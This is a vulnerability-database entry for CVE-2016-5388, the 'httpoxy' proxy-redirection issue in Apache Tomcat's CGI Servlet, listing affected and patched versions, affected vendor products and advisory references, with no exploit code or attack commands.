CVE-2016-5388
Description
Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "A mitigation is planned for future releases of Tomcat, tracked as CVE-2016-5388"; in other words, this is not a CVE ID for a vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.apache.tomcat:tomcat-catalinaMaven | >= 7.0.0, < 7.0.72 | 7.0.72 |
org.apache.tomcat:tomcat-catalinaMaven | >= 8.0.0, < 8.5.5 | 8.5.5 |
Affected products
26- cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:*Range: <=7.5.5.0
cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*+ 1 more
- cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*
- cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*
cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*+ 1 more
- cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*
cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*+ 1 more
- cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*
cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*+ 1 more
- cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_server_tus:7.2:*:*:*:*:*:*:*
cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*+ 1 more
- cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*
- ghsa-coords10 versionspkg:maven/org.apache.tomcat/tomcat-catalinapkg:rpm/suse/tomcat6&distro=SUSE%20Linux%20Enterprise%20Point%20of%20Sale%2011%20SP3pkg:rpm/suse/tomcat6&distro=SUSE%20Linux%20Enterprise%20Server%2011%20SP3-LTSSpkg:rpm/suse/tomcat6&distro=SUSE%20Linux%20Enterprise%20Server%2011%20SP3-TERADATApkg:rpm/suse/tomcat6&distro=SUSE%20Linux%20Enterprise%20Server%2011%20SP4pkg:rpm/suse/tomcat6&distro=SUSE%20Linux%20Enterprise%20Server%20for%20SAP%20Applications%2011%20SP4pkg:rpm/suse/tomcat&distro=SUSE%20Linux%20Enterprise%20Server%2012%20SP1pkg:rpm/suse/tomcat&distro=SUSE%20Linux%20Enterprise%20Server%2012-LTSSpkg:rpm/suse/tomcat&distro=SUSE%20Linux%20Enterprise%20Server%20for%20SAP%20Applications%2012pkg:rpm/suse/tomcat&distro=SUSE%20Linux%20Enterprise%20Server%20for%20SAP%20Applications%2012%20SP1
>= 7.0.0, < 7.0.72+ 9 more
- (no CPE)range: >= 7.0.0, < 7.0.72
- (no CPE)range: < 6.0.53-0.56.1
- (no CPE)range: < 6.0.53-0.56.1
- (no CPE)range: < 6.0.53-0.56.1
- (no CPE)range: < 6.0.45-0.53.2
- (no CPE)range: < 6.0.45-0.53.2
- (no CPE)range: < 8.0.32-8.7
- (no CPE)range: < 7.0.78-7.13.4
- (no CPE)range: < 7.0.78-7.13.4
- (no CPE)range: < 8.0.32-8.7
Patches
Vulnerability mechanics
References
46- www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.htmlnvdPatchThird Party Advisory
- lists.opensuse.org/opensuse-updates/2016-09/msg00025.htmlnvdThird Party Advisory
- rhn.redhat.com/errata/RHSA-2016-1624.htmlnvdThird Party Advisory
- rhn.redhat.com/errata/RHSA-2016-2045.htmlnvdThird Party Advisory
- rhn.redhat.com/errata/RHSA-2016-2046.htmlnvdThird Party Advisory
- www.kb.cert.org/vuls/id/797896nvdThird Party AdvisoryUS Government Resource
- www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.htmlnvdThird Party Advisory
- www.securityfocus.com/bid/91818nvdThird Party AdvisoryVDB Entry
- www.securitytracker.com/id/1036331nvdThird Party AdvisoryVDB EntryVendor Advisory
- access.redhat.com/errata/RHSA-2016:1635nvdThird Party AdvisoryWEB
- access.redhat.com/errata/RHSA-2016:1636nvdThird Party AdvisoryWEB
- github.com/advisories/GHSA-v646-rx6w-r3qqghsaADVISORY
- h20566.www2.hpe.com/hpsc/doc/public/displaynvdThird Party AdvisoryWEB
- h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplaynvdThird Party AdvisoryWEB
- h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplaynvdThird Party AdvisoryWEB
- h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplaynvdThird Party AdvisoryWEB
- httpoxy.orgnvdThird Party Advisory
- nvd.nist.gov/vuln/detail/CVE-2016-5388ghsaADVISORY
- tomcat.apache.org/tomcat-7.0-doc/changelog.htmlnvdRelease NotesVendor AdvisoryWEB
- www.apache.org/security/asf-httpoxy-response.txtnvdVendor AdvisoryWEB
- access.redhat.com/errata/RHSA-2016:1624ghsaWEB
- access.redhat.com/errata/RHSA-2016:2045ghsaWEB
- access.redhat.com/errata/RHSA-2016:2046ghsaWEB
- access.redhat.com/security/cve/CVE-2016-5388ghsaWEB
- bugzilla.redhat.com/show_bug.cgighsaWEB
- github.com/apache/tomcat/commit/1b91e91194a095ea922f96d1dccddf6fbc446e54ghsaWEB
- github.com/apache/tomcat/commit/880250877b0643956435282afb9c111450cfff4cghsaWEB
- github.com/apache/tomcat/commit/fb3569fbb9a2f55459aa8e1e22bc35a737e66329ghsaWEB
- lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272%40%3Cissues.activemq.apache.org%3EnvdWEB
- lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3EghsaWEB
- lists.apache.org/thread.html/6b414817c2b0bf351138911c8c922ec5dd577ebc0b9a7f42d705752d%40%3Cissues.activemq.apache.org%3EnvdWEB
- lists.apache.org/thread.html/6b414817c2b0bf351138911c8c922ec5dd577ebc0b9a7f42d705752d@%3Cissues.activemq.apache.org%3EghsaWEB
- lists.apache.org/thread.html/6d3d34adcf3dfc48e36342aa1f18ce3c20bb8e4c458a97508d5bfed1%40%3Cissues.activemq.apache.org%3EnvdWEB
- lists.apache.org/thread.html/6d3d34adcf3dfc48e36342aa1f18ce3c20bb8e4c458a97508d5bfed1@%3Cissues.activemq.apache.org%3EghsaWEB
- lists.apache.org/thread.html/r2853582063cfd9e7fbae1e029ae004e6a83482ae9b70a698996353dd%40%3Cusers.tomcat.apache.org%3EnvdWEB
- lists.apache.org/thread.html/r2853582063cfd9e7fbae1e029ae004e6a83482ae9b70a698996353dd@%3Cusers.tomcat.apache.org%3EghsaWEB
- lists.apache.org/thread.html/rc6b2147532416cc736e68a32678d3947b7053c3085cf43a9874fd102%40%3Cusers.tomcat.apache.org%3EnvdWEB
- lists.apache.org/thread.html/rc6b2147532416cc736e68a32678d3947b7053c3085cf43a9874fd102@%3Cusers.tomcat.apache.org%3EghsaWEB
- lists.apache.org/thread.html/rf21b368769ae70de4dee840a3228721ae442f1d51ad8742003aefe39%40%3Cusers.tomcat.apache.org%3EnvdWEB
- lists.apache.org/thread.html/rf21b368769ae70de4dee840a3228721ae442f1d51ad8742003aefe39@%3Cusers.tomcat.apache.org%3EghsaWEB
- lists.debian.org/debian-lts-announce/2019/08/msg00015.htmlnvdWEB
- lists.opensuse.org/opensuse-updates/2016-09/msg00025.htmlghsaWEB
- rhn.redhat.com/errata/RHSA-2016-1624.htmlghsaWEB
- rhn.redhat.com/errata/RHSA-2016-2045.htmlghsaWEB
- rhn.redhat.com/errata/RHSA-2016-2046.htmlghsaWEB
- www.kb.cert.org/vuls/id/797896ghsaWEB
News mentions
0No linked articles in our index yet.